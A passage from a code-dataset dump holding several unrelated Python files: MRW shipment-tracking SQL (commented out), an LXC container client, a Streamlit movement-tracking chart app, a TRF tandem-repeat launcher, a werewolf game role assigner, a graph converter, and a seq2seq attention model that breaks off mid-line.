str(response.Seguimiento.Abonado[0].SeguimientoAbonado.Seguimiento[0].EstadoDescripcion)\n                #         fechaEntregaMrw = str(response.Seguimiento.Abonado[0].SeguimientoAbonado.Seguimiento[0].FechaEntrega)\n                #         horaEntregaMrw = str(response.Seguimiento.Abonado[0].SeguimientoAbonado.Seguimiento[0].HoraEntrega)\n                #         intentosentregaMrw = str(response.Seguimiento.Abonado[0].SeguimientoAbonado.Seguimiento[0].Intentos)\n                #         personaEntregaMrw = str(response.Seguimiento.Abonado[0].SeguimientoAbonado.Seguimiento[0].PersonaEntrega)\n                #         numAlbaranMrw = str(response.Seguimiento.Abonado[0].SeguimientoAbonado.Seguimiento[0].NumAlbaran)\n\n                #         if fechaEntregaMrw == \"None\":\n                #             cx[\"cur\"].execute(\"UPDATE idl_ecommerce SET entregadomrw = false, estadoentregamrw = '\" + estadoEntregaMrw + \"', 
descestadoentregamrw = '\" + descEstadoentregaMrw + \"', intentosentregamrw = '\" + intentosentregaMrw + \"', personaentregamrw = '\" + personaEntregaMrw + \"', numalbaranmrw = '\" + numAlbaranMrw + \"' WHERE id = \" + str(idEcommerce))\n # else:\n # entregadoMrw = \"FALSE\"\n # fechaEntregaMrw = fechaEntregaMrw[4:8] + \"-\" + fechaEntregaMrw[2:4] + \"-\" + fechaEntregaMrw[0:2]\n # horaEntregaMrw = horaEntregaMrw[0:2] + \":\" + horaEntregaMrw[2:4]\n # if estadoEntregaMrw == \"00\":\n # entregadoMrw = \"TRUE\"\n\n # cx[\"cur\"].execute(\"UPDATE idl_ecommerce SET entregadomrw = \" + entregadoMrw + \", estadoentregamrw = '\" + estadoEntregaMrw + \"', descestadoentregamrw = '\" + descEstadoentregaMrw + \"', fechaentregamrw = '\" + fechaEntregaMrw + \"', horaentregamrw = '\" + horaEntregaMrw + \"', intentosentregamrw = '\" + intentosentregaMrw + \"', personaentregamrw = '\" + personaEntregaMrw + \"', numalbaranmrw = '\" + numAlbaranMrw + \"' WHERE id = \" + str(idEcommerce))\n\n # cx[\"conn\"].commit()\n # else:\n # cx[\"cur\"].execute(\"UPDATE idl_ecommerce SET descestadoentregamrw = 'No hay seguimiento' WHERE id = \" + str(idEcommerce))\n # cx[\"conn\"].commit()\n # else:\n # cx[\"cur\"].execute(\"UPDATE idl_ecommerce SET descestadoentregamrw = 'No encontrado' WHERE id = \" + str(idEcommerce))\n # cx[\"conn\"].commit()\n\n except Exception as e:\n print(e)\n\n cx[\"cur\"].execute(\"DELETE FROM eg_fichprocesados WHERE tipo = 'MRW_ESTADOS'\")\n cx[\"conn\"].commit()\n cierraConexion(cx)\n\n return True\n","sub_path":"peticionesidl/enviarArticulosAmazon.py","file_name":"enviarArticulosAmazon.py","file_ext":"py","file_size_in_byte":4466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"410614591","text":"from oslo.config import cfg\nfrom wormhole.i18n import _\nfrom wormhole.common import log\nfrom wormhole.common import utils\nfrom wormhole.common import excutils\nfrom wormhole import exception\nfrom wormhole.net_util import network\n\nimport os\nimport stat\n\nlxc_opts = [\n cfg.StrOpt('vif_driver',\n default='wormhole.net_util.vifs.GenericVIFDriver'),\n cfg.BoolOpt('insecure_registry',\n default=False,\n help='Set true if need insecure registry access.'),\n]\n\nCONF = cfg.CONF\nCONF.register_opts(lxc_opts, 'lxc')\n\nLOG = log.getLogger(__name__)\nLXC_MOUNT_DIR = '/lxc/'\nLXC_PATH = '/var/lib/lxc'\nLXC_TEMPLATE_SCRIPT = '/var/lib/wormhole/bin/lxc-general'\n\nLXC_NET_CONFIG_TEMPLATE = \"\"\"# new network\nlxc.network.type = veth\nlxc.network.link = %(bridge)s\nlxc.network.veth.pair = %(tap)s\nlxc.network.name = %(name)s\nlxc.network.flags = up\nlxc.network.hwaddr = %(address)s\nlxc.network.mtu = %(mtu)s\n\"\"\"\n\ndef lxc_root(name):\n return LXC_PATH + \"/\" + name + \"/\"\n\ndef lxc_conf_dir(name):\n return lxc_root(name) + \"conf.d/\"\n\ndef lxc_hook_dir(name):\n return lxc_root(name) + \"hooks/\"\n\ndef lxc_device_conf_file(name, device):\n device_name = os.path.basename(device)\n return lxc_conf_dir(name) + \"dev_\" + device_name + \".conf\"\n\ndef lxc_net_conf_file(name, vif=\"all\"):\n return lxc_conf_dir(name) + \"net_\" + vif + \".conf\"\n\ndef lxc_autodev_hook_script(name, device):\n device_name = os.path.basename(device)\n return lxc_hook_dir(name) + \"autodev_\" + device_name + \".sh\"\n\ndef lxc_net_conf(name, net_name, vif):\n\n conf = \"## START %s\\n\"%vif['id'][:11]\n conf += LXC_NET_CONFIG_TEMPLATE % {\n \"bridge\": \"qbr%s\"%vif['id'][:11],\n \"tap\": \"tap%s\"%vif['id'][:11],\n \"name\": net_name,\n \"mtu\": 
str(vif.get('mtu',1300)),\n        \"address\": vif['address']\n    }\n    gateway = network.find_gateway(name, vif['network'])\n    ip = network.find_fixed_ip(name, vif['network'])\n    if net_name == \"eth0\":\n        if ip: conf += \"lxc.network.ipv4 = %s\\n\" % ip\n        if gateway: conf += \"lxc.network.ipv4.gateway = %s\\n\" % gateway\n    conf += \"## END\\n\\n\"\n    return conf\n\n\nclass LXCClient(object):\n    def __init__(self):\n        pass\n\n    def execute(self, container_id, *cmd):\n        out, _err = utils.execute('lxc-attach', '-n', container_id, '--', *cmd, attempts=1)\n        return out\n\n    def list(self, all=True):\n        containers, _err = utils.execute('lxc-ls', '-f', '-F', 'NAME,STATE')\n        if containers:\n            # skip the header\n            containers = filter(str.strip, containers.split('\\n')[1:])\n            return [{'id': name, 'status': state, 'name':name}\n                    for name, state in map(str.split, containers)]\n        return []\n\n    def inspect_container(self, container_id):\n        # need to return the container process pid\n        # rsp structure rsp['State']['Pid'] = pid\n        info, _err = utils.execute('lxc-info', '-p', '-n', container_id)\n        return {'State': {'Pid': info.split()[-1]}} if info else {}\n\n    def create_container(self, name, network_disabled=False):\n        try:\n            utils.execute('lxc-create', '-n', name, '-t', LXC_TEMPLATE_SCRIPT)\n        except Exception as ex:\n            with excutils.save_and_reraise_exception():\n                LOG.error(_('Failed to create container '\n                            '%(name)s: %(ex)s'),\n                          {'name': name, 'ex': ex.message})\n                # no network has been wired up at create time\n                self.destroy(name, None)\n\n\n    def destroy(self, name, network_info):\n        \"\"\"Destroy the instance on the LXD host\n\n        \"\"\"\n        try:\n            utils.execute('lxc-destroy', '-f', '-n', name)\n            LOG.info('Destroyed for %s' %name)\n        except Exception as ex:\n            with excutils.save_and_reraise_exception():\n                LOG.error(_('Failed to remove container'\n                            ' for %(name)s: %(ex)s'),\n                          {'name': name, 'ex': ex.message})\n\n    def images(self, name=None):\n        return True\n\n    def pull(self, repository, tag=None, insecure_registry=True):\n        pass\n\n    def stop(self, name, timeout):\n        containers = self.list()\n        status = [c['status'] for c in containers if c['name'] == name] or ['']\n        if status and status[0] != 'RUNNING':\n            return \"Container {} is {}, can't stop it\".format(name, status[0])\n        try:\n            utils.execute('lxc-stop', '-n', name, '-t', timeout)\n        except Exception as ex:\n            with excutils.save_and_reraise_exception():\n                LOG.error(_('Failed to stop container'\n                            ' for %(name)s: %(ex)s'),\n                          {'name': name, 'ex': ex.message})\n\n    def pause(self, name):\n        try:\n            utils.execute('lxc-freeze', '-n', name)\n        except Exception as ex:\n            with excutils.save_and_reraise_exception():\n                LOG.error(_('Failed to pause container for %(name)s: %(ex)s'),\n                          {'name': name, 'ex': ex.message})\n\n    def unpause(self, name):\n        try:\n            utils.execute('lxc-unfreeze', '-n', name)\n        except Exception as ex:\n            with excutils.save_and_reraise_exception():\n                LOG.error(_('Failed to unpause container for %(name)s: %(ex)s'),\n                          {'name': name, 'ex': ex.message})\n\n    def inject_file(self, name, path, content):\n\n        if os.path.isdir(LXC_MOUNT_DIR + os.path.dirname(path)):\n            with open(LXC_MOUNT_DIR + path, 'w') as f: f.write(content)\n        else:\n            raise exception.DirNotFound(dir=os.path.dirname(path))\n\n    def read_file(self, name, path):\n        with open(LXC_MOUNT_DIR + path, 'r') as f: return f.read()\n\n    def _dynamic_attach_or_detach_volume(self, name, device, maj, min, attach=True):\n\n        action = 'add' if attach else 'del'\n\n        utils.execute('lxc-device', '-n', name, action, device)\n\n        cgroup_device_allow = '/sys/fs/cgroup/devices/lxc/%s/devices.%s' \\\n                
%(name, 'allow' if attach else 'deny')\n        for i in range(1, 16):\n            with open(cgroup_device_allow, 'w') as f:\n                f.write('b %(maj)s:%(min)s rwm\\n'%{'maj':maj, 'min':min+i})\n\n    def attach_volume(self, name, device, mount_device, static=True):\n        try:\n            s = os.stat(device)\n            if not stat.S_ISBLK(s.st_mode):\n                raise exception.InvalidInput(reason='\"%s\" is not block device'%device)\n            maj, min = os.major(s.st_rdev), os.minor(s.st_rdev)\n            if not static:\n                # ignore mount_device now\n                self._dynamic_attach_or_detach_volume(name, device, maj, min, attach=True)\n            else:\n                conf_path = lxc_device_conf_file(name, device)\n                with open(conf_path, 'w') as f:\n                    for i in range(16):\n                        f.write('lxc.cgroup.devices.allow = '\n                                'b %(maj)s:%(min)s rwm\\n'%{'maj':maj, 'min':min+i})\n\n                LOG.info(_(\"new config path %(path)s for %(device)s\"),\n                        {'path': conf_path, 'device': device})\n                # autodev hook:\n                # add the partitions of this device into the container when it starts\n                with open(lxc_autodev_hook_script(name, device), 'w') as f, \\\n                        open('/proc/partitions', 'r') as p:\n                    for line in p:\n                        fields = line.split()\n                        if fields and fields[-1].startswith(os.path.basename(device)):\n                            f.write(\"mknod --mode=0660 $LXC_ROOTFS_MOUNT/dev/%(device)s \"\n                                    \"b %(maj)s %(min)s\\n\" % {\n                                        \"device\": fields[-1], \"maj\":fields[0], \"min\":fields[1]})\n\n\n        except Exception as ex:\n            with excutils.save_and_reraise_exception():\n                LOG.error(_('Failed to attach device %(device)s '\n                            ' for %(name)s: %(ex)s'),\n                          {'name': name, 'ex': ex.message, 'device': device})\n\n    def detach_volume(self, name, device, mount_device, static=True):\n        try:\n            s = os.stat(device)\n            if not stat.S_ISBLK(s.st_mode):\n                raise exception.InvalidInput(reason='\"%s\" is not block device'%device)\n            maj, min = os.major(s.st_rdev), os.minor(s.st_rdev)\n            if not static:\n                self._dynamic_attach_or_detach_volume(name, device, maj, min, attach=False)\n            for cb in [lxc_device_conf_file, lxc_autodev_hook_script]:\n                path = cb(name, device)\n                if path and os.path.isfile(path):\n                    os.remove(path)\n                    LOG.info(_(\"delete path %(path)s for %(device)s\"),\n                            {'path': path, 'device': device})\n        except Exception as ex:\n            with excutils.save_and_reraise_exception():\n                LOG.error(_('Failed to detach device %(device)s '\n                            ' for %(name)s: %(ex)s'),\n                          {'name': name, 'ex': ex.message, 'device': device})\n\n    def remove_interfaces(self, name, network_info):\n        for vif in network_info:\n            if_local_name = 'tap%s' % vif['id'][:11]\n            utils.trycmd('ip', 'link', 'del', if_local_name, run_as_root=True)\n            _file = lxc_net_conf_file(name, vif['id'][:11])\n            LOG.debug(\"remove net conf %s\\n\", vif['id'][:11])\n            if os.path.isfile(_file):\n                os.remove(_file)\n\n    def add_interfaces(self, name, network_info, append=True, net_names=[]):\n        network_info = network_info or []\n        if not append:\n            _dir = lxc_conf_dir(name)\n            for _f in os.listdir(_dir):\n                if _f.startswith('net_') and _f.endswith('.conf'):\n                    _f = _dir + \"/\" + _f\n                    os.remove(_f)\n                    LOG.debug(\"remove file %s\", _f)\n\n        if not net_names:\n            net_names = [\"eth%d\"%i for i in range(len(network_info))]\n        for net_name, vif in zip(net_names, network_info):\n            conf = lxc_net_conf(name, net_name, vif)\n            LOG.debug(\"new net conf %s, content: %s\\n\", vif['id'][:11], conf)\n            with open(lxc_net_conf_file(name, vif['id'][:11]), \"w\") as f:\n                f.write(conf)\n\n    def start(self, name, network_info=None, block_device_info=None, timeout=10):\n        # Start the container\n        try:\n            self.add_interfaces(name, network_info, append=False)\n            utils.execute('lxc-start', '-n', name, '-d', '-l', 'DEBUG')\n            
utils.execute('lxc-wait', '-n', name, '-s', 'RUNNING', '-t', timeout)\n except Exception as ex:\n with excutils.save_and_reraise_exception():\n LOG.error(_('Failed to start container'\n ' for %(name)s: %(ex)s'),\n {'name': name, 'ex': ex.message})\n","sub_path":"wormhole/lxc_client.py","file_name":"lxc_client.py","file_ext":"py","file_size_in_byte":11030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"621679549","text":"import pydeck as pdk\nimport datetime\nimport math\nimport altair as alt\nfrom altair import Chart, X, Y, Axis, SortField, OpacityValue\nimport plotly.figure_factory as ff\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport time\nimport streamlit as st\n\n#READ CSV FILE AND TEST STREAMLIT DEVELOPMENT IN THIS FILE.\ndef load_data(nrows):\n data = pd.read_csv('sweetpea.csv')\n return data\ndata = load_data(10000)\nprint(data)\n\ndata['date_time'] = pd.to_datetime(data['date_time']) # this creates an odd time stamp in streamlit. Not required.\n\nst.title('Sweet Pea Movements')\nst.image('./Sweet_Pea.jpg', caption='Feeling those wiggles')\n\nst.subheader('Record wiggles here https://forms.gle/xW1HJuyCyQ4bywFU7')\n\nst.subheader('View all wiggles')\nst.write(data)\nst.altair_chart(alt.Chart(data)\n\t\t\t\t.mark_rect()\n\t\t\t\t.encode(\n\talt.X('hours(date_time):O', title='hour'),\n\talt.Y('monthdate(date_time):O', title='day'),\n\tcolor='count(data):Q',\n\ttooltip=[\n\t\talt.Tooltip('hours(date_time):O', title='hour'),\n\t\talt.Tooltip('count(data):Q', title='Wiggle count')\n\t]\n).properties(\n\ttitle='All the wiggles'\n))\n\n\nst.title(\"Wiggles by hour\")\nhour_selected = st.slider(\"Select hour of wiggles\", 0, 23)\n\n# FILTERING DATA BY HOUR SELECTED\ndata = data[data['date_time'].dt.hour == hour_selected]\n\n# FILTERING DATA FOR THE HISTORGRAM\n\nfiltered = data[\n\t(data['date_time'].dt.hour >= hour_selected) & (data['date_time'].dt.hour < (hour_selected + 1))\n\t]\n\nhist = np.histogram(filtered['date_time'].dt.minute, bins=60, range=(0, 60))[0]\nchart_data = pd.DataFrame({\"minute\": range(60), \"movement\": hist})\n\n#LAYING OUT THE HISTOGRAM SECTIONs\n\nst.write(\"\")\nst.write(\"**Wiggles per minute between %i:00 and %i:00**\" % (hour_selected, (hour_selected + 1) % 24))\n\nst.altair_chart(alt.Chart(chart_data)\n\t.mark_area(\n\t\tinterpolate='step-after',\n\t).encode(\n\t\tx=alt.X(\"minute:Q\", scale=alt.Scale(nice=False)),\n\t\ty=alt.Y(\"movement:Q\"),\n\t\ttooltip=['minute', 'movement']\n\t).configure_mark(\n\t\topacity=0.5,\n\t\tcolor='blue'\n\t), use_container_width=True)\n\n\n\n\n\nst.line_chart(data)\nst.write(data)\n\n","sub_path":"milkbar_streamlit_csv.py","file_name":"milkbar_streamlit_csv.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"176851855","text":"#!/usr/bin/env python\n\n# Copyright INRA (Institut National de la Recherche Agronomique)\n# http://www.inra.fr\n# http://urgi.versailles.inra.fr\n#\n# This software is governed by the CeCILL license under French law and\n# abiding by the rules of distribution of free software. 
You can use,\n# modify and/ or redistribute the software under the terms of the CeCILL\n# license as circulated by CEA, CNRS and INRIA at the following URL\n# \"http://www.cecill.info\".\n#\n# As a counterpart to the access to the source code and rights to copy,\n# modify and redistribute granted by the license, users are provided only\n# with a limited warranty and the software's author, the holder of the\n# economic rights, and the successive licensors have only limited\n# liability.\n#\n# In this respect, the user's attention is drawn to the risks associated\n# with loading, using, modifying and/or developing or reproducing the\n# software by the user in light of its specific status of free software,\n# that may mean that it is complicated to manipulate, and that also\n# therefore means that it is reserved for developers and experienced\n# professionals having in-depth computer knowledge. Users are therefore\n# encouraged to load and test the software's suitability as regards their\n# requirements in conditions enabling the security of their systems and/or\n# data to be ensured and, more generally, to use and operate it in the\n# same conditions as regards security.\n#\n# The fact that you are presently reading this means that you have had\n# knowledge of the CeCILL license and that you accept its terms.\n\nimport os\nimport shutil\nimport subprocess\nfrom commons.core.LoggerFactory import LoggerFactory\nfrom commons.core.checker.CheckerUtils import CheckerUtils\nfrom commons.core.checker.RepetException import RepetException\nfrom commons.core.utils.FileUtils import FileUtils\nfrom commons.core.utils.RepetOptionParser import RepetOptionParser\n\nLOG_DEPTH = \"commons.launcher\"\n\n##Launch TRF\n#\nclass LaunchTRF(object):\n\n def __init__(self, inFileName = \"\", outFileName = \"\", maxPeriod = 15, doClean = False, verbosity = 3):\n self._inFileName = inFileName\n self.setOutFileName(outFileName)\n self._outMaskedFileName = \"\"\n self._mismatch = 3\n self._indelPenalty = 5\n self._minScore = 20\n self._maxPeriod = maxPeriod\n\n self._doClean = doClean\n self._verbosity = verbosity\n self._log = LoggerFactory.createLogger(\"%s.%s\" % (LOG_DEPTH, self.__class__.__name__), self._verbosity)\n\n def setAttributesFromCmdLine(self):\n usage = \"LaunchTRF.py [options]\"\n description = \"Launch TRF to detect micro-satellites in sequences.\\n\"\n epilog = \"\\nExample: launch with a maximum period size of 10, keep temporary files and display only warnings.\\n\"\n epilog += \"\\t$ LaunchTRF.py -i genome.fa -m 10 -v 2\\n\"\n parser = RepetOptionParser(description = description, epilog = epilog, usage = usage)\n parser.add_option(\"-i\", \"--in\", dest = \"inFileName\", action = \"store\", type = \"string\", help = \"input file name [compulsory] [format: fasta]\", default = \"\")\n parser.add_option(\"-o\", \"--out\", dest = \"outFileName\", action = \"store\", type = \"string\", help = \"output file name [default: .TRF.set]\", default = \"\")\n parser.add_option(\"--outMaskedFile\", dest = \"outMaskedFile\", action = \"store\", type = \"string\", help = \"output masked FASTA file name [optional] [default: no output]\", default = \"\")\n parser.add_option(\"-M\", \"--mismatch\", dest = \"mismatch\", action = \"store\", type = \"int\", help = \"mismatching penalty [default: 3]\", default = 3)\n parser.add_option(\"-p\", \"--penaltyIn\", dest = \"indelPen\", action = \"store\", type = \"int\", help = \"indel penalty [default: 5]\", default = 5)\n parser.add_option(\"-s\", \"--scoreMin\", dest = 
\"minScore\", action = \"store\", type = \"int\", help = \"minimum alignment score to report [default: 20]\", default = 20)\n parser.add_option(\"-m\", \"--maxPeriod\", dest = \"maxPeriod\", action = \"store\", type = \"int\", help = \"maximum period size to report [default: 15]\", default = 15)\n parser.add_option(\"-c\", \"--clean\", dest = \"doClean\", action = \"store_true\", help = \"clean temporary files [optional] [default: False]\", default = False)\n parser.add_option(\"-v\", \"--verbosity\", dest = \"verbosity\", action = \"store\", type = \"int\", help = \"verbosity [optional] [default: 3]\", default = 3)\n options = parser.parse_args()[0]\n self._setAttributesFromOptions(options)\n\n def _setAttributesFromOptions(self, options):\n self.setInFileName(options.inFileName)\n self.setOutFileName(options.outFileName)\n self.setMismatch(options.mismatch)\n self.setIndelPenalty(options.indelPen)\n self.setMinScore(options.minScore)\n self.setMaxPeriod(options.maxPeriod)\n self.setOutMaskedFileName(options.outMaskedFile)\n self.setDoClean(options.doClean)\n self.setVerbosity(options.verbosity)\n\n def setInFileName(self, inFileName):\n self._inFileName = inFileName\n\n def setOutFileName(self, outFileName):\n if outFileName == \"\":\n self._outFileName = \"%s.TRF.set\" % self._inFileName\n else:\n self._outFileName = outFileName\n\n def setMismatch(self, mismatch):\n self._mismatch = mismatch\n\n def setIndelPenalty(self, indelPenalty):\n self._indelPenalty = indelPenalty\n\n def setMinScore(self, minScore):\n self._minScore = minScore\n\n def setMaxPeriod(self, maxPeriod):\n self._maxPeriod = maxPeriod\n\n def setOutMaskedFileName(self, outMaskedFile):\n self._outMaskedFileName = outMaskedFile\n\n def setDoClean(self, doClean):\n self._doClean = doClean\n\n def setVerbosity(self, verbosity):\n self._verbosity = verbosity\n\n def _checkOptions(self):\n if self._inFileName == \"\":\n self._logAndRaise(\"Missing input fasta file name\")\n else:\n if not FileUtils.isRessourceExists(self._inFileName):\n self._logAndRaise(\"Input fasta file '%s' does not exist!\" % self._inFileName)\n\n self._log.debug(\"Forcing integer type for maxPeriod, mismatch, penaltyIn and scoreMin parameters\")\n self._maxPeriod = int(self._maxPeriod)\n self._mismatch = int(self._mismatch)\n self._indelPenalty = int(self._indelPenalty)\n self._minScore = int(self._minScore)\n if self._maxPeriod < 1:\n self._logAndRaise(\"maxPeriod ('-m' option) must be a strictly positive integer\")\n if self._mismatch < 0:\n self._logAndRaise(\"mismatch ('-M' option) must be a positive integer\")\n if self._indelPenalty < 0:\n self._logAndRaise(\"penaltyIn ('-p' option) must be a positive integer\")\n if self._minScore < 0:\n self._logAndRaise(\"scoreMin ('-s' option) must be a positive integer\")\n\n def _logAndRaise(self, errorMsg):\n self._log.error(errorMsg)\n raise RepetException(errorMsg)\n\n def _launchTRF(self):\n cmd = \"trf %s 2 %d %d 80 10 %d %d -h -d\" % (self._inFileName, self._mismatch, self._indelPenalty, self._minScore, self._maxPeriod)\n\n if self._outMaskedFileName:\n cmd += \" -m\"\n self._log.debug(\"Running : %s\" % cmd)\n process = subprocess.Popen(cmd.split(' '), stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n output = process.communicate()\n self._log.debug(\"Output:\\n%s\" % output[0])\n\n def _parseTRF(self):\n self._log.debug(\"Parsing TRF output\")\n with open(\"%s.2.%d.%d.80.10.%d.%d.dat\" % (self._inFileName, self._mismatch, self._indelPenalty, self._minScore, self._maxPeriod), 'r') as inFile:\n 
with open(self._outFileName, 'w') as outFile:\r\n                nbPatterns = 0\r\n                nbInSeq = 0\r\n                for line in inFile:\r\n                    data = line.split(\" \")\r\n                    if len(data) > 1 and \"Sequence:\" in data[0]:\r\n                        nbInSeq += 1\r\n                        seqName = data[1][:-1]\r\n                    if len(data) >= 14:\r\n                        nbPatterns += 1\r\n                        consensus = data[13]\r\n                        copyNb = int(float(data[3]) + 0.5)\r\n                        start = data[0]\r\n                        end = data[1]\r\n                        outFile.write(\"%i\\t(%s)%i\\t%s\\t%s\\t%s\\n\" % (nbPatterns, consensus, copyNb, seqName, start, end))\r\n        self._log.debug(\"Finished Parsing TRF output\")\r\n\r\n    def run(self):\r\n        \"\"\"\r\n        Launch TRF to detect micro-satellites in sequences.\r\n        \"\"\"\r\n        LoggerFactory.setLevel(self._log, self._verbosity)\r\n        self._log.info(\"START LaunchTRF\")\r\n\r\n        if not CheckerUtils.isExecutableInUserPath(\"trf\"):\r\n            self._logAndRaise(\"ERROR: 'trf' must be in your path\")\r\n        self._checkOptions()\r\n        self._log.debug(\"Input file name: %s\" % self._inFileName)\r\n\r\n        self._launchTRF()\r\n        self._parseTRF()\r\n\r\n        if self._outMaskedFileName:\r\n            shutil.move(\"%s.2.%d.%d.80.10.%d.%d.mask\" % (self._inFileName, self._mismatch, self._indelPenalty, self._minScore, self._maxPeriod), self._outMaskedFileName)\r\n\r\n        if self._doClean:\r\n            self._log.warning(\"Temporary files will be cleaned\")\r\n            try:\r\n                os.remove(\"%s.2.%d.%d.80.10.%d.%d.dat\" % (self._inFileName, self._mismatch, self._indelPenalty, self._minScore, self._maxPeriod))\r\n            except:pass\r\n\r\n        self._log.info(\"END LaunchTRF\")\r\n\r\nif __name__ == \"__main__\":\r\n    iLaunchTRF = LaunchTRF()\r\n    iLaunchTRF.setAttributesFromCmdLine()\r\n    iLaunchTRF.run()","sub_path":"commons/launcher/LaunchTRF.py","file_name":"LaunchTRF.py","file_ext":"py","file_size_in_byte":9613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"17190514","text":"#Role Assign\nimport random\nimport character \nimport chat_group \n\nclass Players():\n    \n    def __init__(self):\n        self.gaming_group = []\n        self.win_side = ''\n\n    def role_assign(self, chat_group):\n        #role lists keyed by player count; the 3-player list is just for testing\n        roles = {3:[\"villager\",\"wolf\",\"wolf\"],\\\n                 4:[\"villager\",\"villager\", \"wolf\", \"prophet\"],\\\n                 5:['villager', 'villager', 'wolf', 'prophet', 'witch'],\\\n                 6:['villager','villager', 'wolf', 'prophet', 'witch', 'wolf'],\\\n                 7:['villager','villager', 'wolf','wolf', 'prophet', 'witch', 'villager'],\\\n                 8:['villager','villager','villager', 'wolf','wolf', 'prophet', 'witch', 'wolf'],\\\n                 9:['villager','villager','villager','villager', 'wolf','wolf','wolf', 'prophet', 'witch'],\\\n                 10:['villager','villager','villager','villager', 'wolf','wolf','wolf', 'prophet', 'witch', 'wolf']}\n        number = len(chat_group)\n        game_roles = roles[number]\n        print(\"Roles in this round: \", game_roles)\n        gaming_groups = []\n        for player in chat_group:\n            c = character.Character(player)\n            random.shuffle(game_roles)\n            c.set_role(game_roles.pop())\n            gaming_groups.append(c)\n        \n        return gaming_groups\n    \n    def get_gaming_group(self, chat_group):\n        self.gaming_group = self.role_assign(chat_group)\n        return self.gaming_group\n    \n    def judge_result(self,gaming_group):\n        alive = {}\n        for player in gaming_group:\n            if player.get_status() == 'alive':\n                alive[player.playerName] = player.get_role()\n        if 'wolf' not in alive.values():\n            if 'villager' not in alive.values():\n                self.win_side = 'no one wins, both villagers and wolves are dead. 
\\n'\n self.status = 'gameover'\n return self.win_side\n else:\n self.win_side = 'villager\\n'\n self.status = 'gameover'\n return self.win_side\n elif 'villager' not in alive.values():\n if 'wolf' not in alive.values():\n self.win_side = 'no one wins, both villagers and wolves are dead. \\n'\n self.status = 'gameover'\n return self.win_side\n else:\n self.win_side = 'wolf\\n'\n self.status = 'gameover'\n return self.win_side\n elif 'prophet' not in alive.values() and 'witch' not in alive.values():\n self.win_side = 'wolves\\n'\n self.status = 'gameover'\n return self.win_side\n else:\n return \"continue\"\n \n \n \n \n \n \n\n\n\n\n\n\n \n\n","sub_path":"players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"335078188","text":"#!/usr/bin/env python3\nimport sys\nimport ast\nimport json\nimport getpass\nimport os\nimport fileinput\nimport re\n\n\ndata = []\n\n\ndef csvToList(csv):\n with open(csv) as f:\n infile = [line for line in f.readlines()]\n for l in infile:\n line = l.split()\n data.append([int(line[0])])\n\n\n#Each line is composed with each adjacent nodes\n#A line correspond to a node\ndef convertToNeighboor(file):\n with open(file) as x, open('input/graphNeighboor.txt', 'w') as outfile:\n infile = [line for line in x.readlines()]\n edges = 0\n nodeList = 0\n for d in data:\n for l in infile:\n line = l.split()\n if d[0] == int(line[0]):\n d.extend([int(line[1]), int(line[2])])\n nodeList += 1\n #Comment to have a directed graph\n elif d[0] == int(line[1]):\n d.extend([int(line[0]), int(line[2])])\n #count number of edges\n edges += 1\n \n output = str(edges) + ' ' + str(nodeList) + ' 1\\n'\n for line in data:\n outputLine = ''\n del(line[0])\n for elem in line:\n outputLine += str(elem) + ' '\n output += outputLine.rstrip() + '\\n'\n outfile.write(output.rstrip())\n\n\ndef main(argv):\n csvToList(argv[2])\n convertToNeighboor(argv[1])\n\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n","sub_path":"Converters scripts/graphByNeighboor.py","file_name":"graphByNeighboor.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"212005257","text":"from __future__ import unicode_literals, print_function, division\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport time\nimport random\nimport utils as utils\nimport shutil\n\n\nclass EncoderRNN(nn.Module):\n def __init__(self, vocab_size, hidden_size):\n super(EncoderRNN, self).__init__()\n self.hidden_size = hidden_size\n self.vocab_size = vocab_size\n self.embedding = nn.Embedding(vocab_size, hidden_size, padding_idx=0)\n self.gru = nn.GRU(hidden_size, hidden_size, bidirectional=True, batch_first=True)\n\n def forward(self, input, hidden):\n embedded = self.embedding(input)\n return self.gru(embedded, hidden)\n\n def init_hidden(self, batch_size, use_cuda):\n if use_cuda: return Variable(torch.zeros(2, batch_size, self.hidden_size)).cuda()\n else: return Variable(torch.zeros(2, batch_size, self.hidden_size))\n\n\nclass AttnDecoderRNN(nn.Module):\n def __init__(self, hidden_size, embedding_size, vocab_size, n_layers=1, dropout_p=0.1, embedding_weight=None):\n super(AttnDecoderRNN, self).__init__()\n # Parameters\n self.hidden_size = hidden_size\n self.embedding_size = embedding_size\n self.n_layers = n_layers\n self.dropout_p = dropout_p\n 
self.vocab_size = vocab_size\n\n self.embedding = nn.Embedding(vocab_size, self.embedding_size)\n self.dropout = nn.Dropout(self.dropout_p)\n self.gru = nn.GRU(input_size=self.embedding_size, hidden_size=self.hidden_size, batch_first=True)\n\n # Attention variables\n self.w_h = nn.Parameter(torch.randn(self.hidden_size))\n self.w_s = nn.Parameter(torch.randn(self.hidden_size))\n self.att_bias = nn.Parameter(torch.randn(1))\n self.attn_weight_v = nn.Parameter(torch.randn(self.hidden_size))\n\n # Generator\n self.gen_layer = nn.Linear(self.hidden_size*2 + self.embedding_size, 1)\n self.out_hidden = nn.Linear(self.hidden_size*2, self.embedding_size)\n self.out_vocab = nn.Linear(self.embedding_size, vocab_size)\n\n # Weight_sharing\n if embedding_weight is not None:\n self.out_vocab.weight = embedding_weight\n\n def forward(self, input_token, last_decoder_hidden, encoder_states, full_input_var, use_cuda):\n\n embedded_input = self.embedding(input_token)\n embedded_input = self.dropout(embedded_input)\n decoder_output, decoder_hidden = self.gru(embedded_input, torch.unsqueeze(last_decoder_hidden, 0))\n\n att_dist = F.tanh((self.w_h * encoder_states) + (self.w_s * decoder_output) + self.att_bias)\n att_dist = (self.attn_weight_v * att_dist).sum(-1)\n att_dist = F.softmax(att_dist, dim=-1)\n\n context_vector = 